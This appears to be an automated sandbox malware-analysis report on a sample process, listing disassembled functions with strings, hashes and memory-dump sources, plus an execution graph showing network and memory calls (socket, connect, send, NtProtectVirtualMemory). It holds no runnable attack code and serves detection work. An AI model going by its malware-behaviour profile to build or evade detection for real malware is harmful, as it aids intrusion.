                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
                                          • Instruction ID: a0beedfd14064349cd93d236cab166ebf6afab2a9e8389e16cba178684f12ebb
                                          • Opcode Fuzzy Hash: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
                                          • Instruction Fuzzy Hash: DCF1E3B2D00209EFCF11DF98C9859EEBBB8FF08304F15456AE515E7211EB349A45DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008D822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          • Opcode ID: 4007fc4646c66653722fffa5abfadaea8339a90b90a0af3b7b3ec3a3a9f80a84
                                          • Instruction ID: 25b64f5e3729771b7facb02f76fc0af242c0e27a0224aa70f64947629ec62567
                                          • Opcode Fuzzy Hash: 4007fc4646c66653722fffa5abfadaea8339a90b90a0af3b7b3ec3a3a9f80a84
                                          • Instruction Fuzzy Hash: 2741B472240608FEEB059AA5CC82FDE77ACFF04B54F100213BA14D6391DBB4DB158BA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008813CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
                                          • Instruction ID: f5f1eb41661b95fd6dd23749a24487c9559a515f84d84ab06f078fab21e10d96
                                          • Opcode Fuzzy Hash: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
                                          • Instruction Fuzzy Hash: A6612971900659AACF34EF5DC8848BF7BBAFF95300718C42DE5EAC7640DA34AA41CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008E3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: e7aef442d66fd877d55f3432e01aa595fcb2a0857c76ef3d3bc179dd0c02f9ce
                                          • Instruction ID: 8b612f413166b590399f2b3387e912b67646e4b5f090d464b581ea29fabbd7fb
                                          • Opcode Fuzzy Hash: e7aef442d66fd877d55f3432e01aa595fcb2a0857c76ef3d3bc179dd0c02f9ce
                                          • Instruction Fuzzy Hash: D761B372A00688ABCB20DFAEC8454BE7BF5FF56310B24C569F8A9D7141E274EF409B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00877EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00893F12
                                          Strings
                                          • ExecuteOptions, xrefs: 00893F04
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0089E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00893EC4
                                          • Execute=1, xrefs: 00893F5E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0089E2FB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00893F75
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00893F4A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
                                          • Instruction ID: e582489087936b2a4566a614cd051dbfb65c1ac27f63b148dac223fcba995ee8
                                          • Opcode Fuzzy Hash: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
                                          • Instruction Fuzzy Hash: 4841B771A8421C7ADF20EA94DCC6FEA73BCFB15700F0445A9F509E6181EA70DB45CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00880B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: cfcbb6ca97f2228bade5fefad9ffaad215e8d966836af962544c970eb6306040
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 49A1BD31D0030ADFDBA4EFA8C8446AEB7B6FF05315F24846ED812E7242D6309A49CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00880554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
                                          • Instruction ID: a8fd4c7e0d2ce9fb10b93c1dbdf6b3c463db8367e5eba5cb48dfccc797c8bab1
                                          • Opcode Fuzzy Hash: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
                                          • Instruction Fuzzy Hash: CB513831B002156BEF24DA1CCC81F6673A9FF95720F258229FD54DB386EA35EC418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008814C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 008AEA22
                                            • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 0088146B
                                            • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 00881490
                                          • ___swprintf_l.LIBCMT ref: 0088156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
                                          • Instruction ID: 6655b16f0650f7b97aa4ea8706c48ec0bab12e7c24aa7770bb7f133a35798d25
                                          • Opcode Fuzzy Hash: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
                                          • Instruction Fuzzy Hash: 59218F7290022DABDF20EE58CC49AEB73ACFB50704F444555F856D3241DF74EA598BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008E3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: c8c1e75baf3b4b07f8bf8ff56cd2444c68081f3e1631a2a9b9b59448fc05854d
                                          • Instruction ID: 1deb3199270f0a86f575477495d0f4aa9e2194a8744a1035c6e674077fdd1aff
                                          • Opcode Fuzzy Hash: c8c1e75baf3b4b07f8bf8ff56cd2444c68081f3e1631a2a9b9b59448fc05854d
                                          • Instruction Fuzzy Hash: 55219DB2A0021AABCB20AF6A9C499EB77ACFB15714F040525FD14E3241E774AF5487E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008653A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A22F4
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 008A2328
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008A22FC
                                          • RTL: Resource at %p, xrefs: 008A230B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                          • Instruction ID: 846e5c138287798e3c49dc6e2b7f599e24e904b23faf8e6ba472c83feaf15288
                                          • Opcode Fuzzy Hash: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                          • Instruction Fuzzy Hash: 525126716007056BEF25EB2CCC81FA67398FF56760F114229FD04DB781EA64EC4187A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0086EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008A248D
                                          • RTL: Re-Waiting, xrefs: 008A24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008A24BD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                          • Instruction ID: fb35fb4b4d32b0e6d079d4938f495709c96b3e66186b61ee30ebb3c56d424afc
                                          • Opcode Fuzzy Hash: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                          • Instruction Fuzzy Hash: 18410570A00208ABDB34EBACCC85F6A77A8FF49720F208605F515EB6D1D674E94187A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0087FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: 558b2162ed6b93d0ba3fbfac3104352c126bb81a5c0d458ea2e27ef3e8345b7c
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 0E919032D0020AEBDF24DF59C8456AEBBB0FF55318F24C47AD519EA157E7309A81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008F5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: $$0
                                          • API String ID: 1302938615-389342756
                                          • Opcode ID: 9bb38a626df079887b5ec981eb0324a1365977a7c07d08b23fa8b604c1859ce3
                                          • Instruction ID: eee98adf26141483a244e8787bafa5704017ba20cbdc332d4265a7c39bf859cd
                                          • Opcode Fuzzy Hash: 9bb38a626df079887b5ec981eb0324a1365977a7c07d08b23fa8b604c1859ce3
                                          • Instruction Fuzzy Hash: C0917A30D05A8EAEDF249FB9C8452BDBBB0FF02314F1446AADBA1E6291C7744A45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:457
                                          Total number of Limit Nodes:18
                                          execution_graph 13867 8ca7e0a 13868 8ca6942 13867->13868 13869 8ca7e45 NtProtectVirtualMemory 13868->13869 13870 8ca7e70 13869->13870 13951 8ca014a 13952 8ca0153 13951->13952 13957 8ca0174 13951->13957 13953 8ca2382 2 API calls 13952->13953 13955 8ca016c 13953->13955 13954 8ca01e7 13956 8c9b0f2 6 API calls 13955->13956 13956->13957 13957->13954 13959 8c9b1f2 13957->13959 13960 8c9b20f 13959->13960 13961 8c9b2c9 13959->13961 13962 8ca5f12 7 API calls 13960->13962 13964 8c9b242 13960->13964 13961->13957 13962->13964 13963 8c9b289 13963->13961 13966 8c9b0f2 6 API calls 13963->13966 13964->13963 13965 8c9c432 NtCreateFile 13964->13965 13965->13963 13966->13961 13848 8ca8a4d 13849 8ca8a53 13848->13849 13852 8c9c782 13849->13852 13851 8ca8a6b 13854 8c9c78f 13852->13854 13853 8c9c7ad 13853->13851 13854->13853 13856 8ca1662 13854->13856 13857 8ca166b 13856->13857 13863 8ca17ba 13856->13863 13858 8c9b0f2 6 API calls 13857->13858 13857->13863 13860 8ca16ee 13858->13860 13859 8ca1750 13862 8ca183f 13859->13862 13859->13863 13864 8ca1791 13859->13864 13860->13859 13861 8ca6f82 6 API calls 13860->13861 13861->13859 13862->13863 13865 8ca6f82 6 API calls 13862->13865 13863->13853 13864->13863 13866 8ca6f82 6 API calls 13864->13866 13865->13863 13866->13863 13744 8ca6f82 13745 8ca6fb8 13744->13745 13746 8ca35b2 socket 13745->13746 13747 8ca7081 13745->13747 13755 8ca7022 13745->13755 13746->13747 13748 8ca7134 13747->13748 13750 8ca7117 getaddrinfo 13747->13750 13747->13755 13749 8ca3732 connect 13748->13749 13753 8ca71b2 13748->13753 13748->13755 13749->13753 13750->13748 13751 8ca36b2 send 13754 8ca7729 13751->13754 13752 8ca77f4 setsockopt recv 13752->13755 13753->13751 13753->13755 13754->13752 13754->13755 13906 8c9edd9 13907 8c9edf0 13906->13907 13908 8ca2382 2 API calls 13907->13908 13909 8c9eecd 13907->13909 13908->13909 13485 8c9b2dd 13488 8c9b31a 13485->13488 13486 8c9b3fa 13487 8c9b328 SleepEx 13487->13487 13487->13488 13488->13486 13488->13487 13492 8ca5f12 13488->13492 13501 8c9c432 13488->13501 13511 8c9b0f2 13488->13511 13496 8ca5f48 13492->13496 13493 8ca6134 13493->13488 13494 8ca6232 NtCreateFile 13494->13496 13495 8ca60e9 13498 8ca6125 13495->13498 13529 8ca5842 13495->13529 13496->13493 13496->13494 13496->13495 13517 8ca6f82 13496->13517 13537 8ca5922 13498->13537 13502 8c9c45b 13501->13502 13509 8c9c4c9 13501->13509 13503 8ca6232 NtCreateFile 13502->13503 13502->13509 13504 8c9c496 13503->13504 13505 8c9c4c5 13504->13505 13558 8c9c082 13504->13558 13506 8ca6232 NtCreateFile 13505->13506 13505->13509 13506->13509 13508 8c9c4b6 13508->13505 13567 8c9bf52 13508->13567 13509->13488 13512 8c9b109 13511->13512 13516 8c9b1d3 13511->13516 13572 8c9b012 13512->13572 13514 8ca6f82 6 API calls 13514->13516 13515 8c9b113 13515->13514 13515->13516 13516->13488 13518 8ca6fb8 13517->13518 13520 8ca7081 13518->13520 13528 8ca7022 13518->13528 13545 8ca35b2 13518->13545 13521 8ca7134 13520->13521 13523 8ca7117 getaddrinfo 13520->13523 13520->13528 13526 8ca71b2 13521->13526 13521->13528 13548 8ca3732 13521->13548 13523->13521 13525 8ca77f4 setsockopt recv 13525->13528 13526->13528 13551 8ca36b2 13526->13551 13527 8ca7729 13527->13525 13527->13528 13528->13496 13530 8ca586d 13529->13530 13554 8ca6232 13530->13554 13532 8ca5906 13532->13495 13533 8ca5888 13533->13532 13534 8ca6f82 6 API calls 13533->13534 13535 8ca58c5 13533->13535 13534->13535 13535->13532 13536 8ca6232 NtCreateFile 13535->13536 13536->13532 13538 8ca59c2 13537->13538 13539 8ca6232 NtCreateFile 13538->13539 13542 8ca59d6 13539->13542 13540 8ca5a9f 13540->13493 13541 8ca5a5d 13541->13540 13543 8ca6232 NtCreateFile 13541->13543 13542->13540 13542->13541 13544 8ca6f82 6 API calls 13542->13544 13543->13540 13544->13541 13546 8ca360a socket 13545->13546 13547 8ca35ec 13545->13547 13546->13520 13547->13546 13549 8ca376a 13548->13549 13550 8ca3788 connect 13548->13550 13549->13550 13550->13526 13552 8ca36e7 13551->13552 13553 8ca3705 send 13551->13553 13552->13553 13553->13527 13555 8ca625c 13554->13555 13557 8ca6334 13554->13557 13556 8ca6410 NtCreateFile 13555->13556 13555->13557 13556->13557 13557->13533 13559 8c9c420 13558->13559 13560 8c9c0aa 13558->13560 13559->13508 13560->13559 13561 8ca6232 NtCreateFile 13560->13561 13563 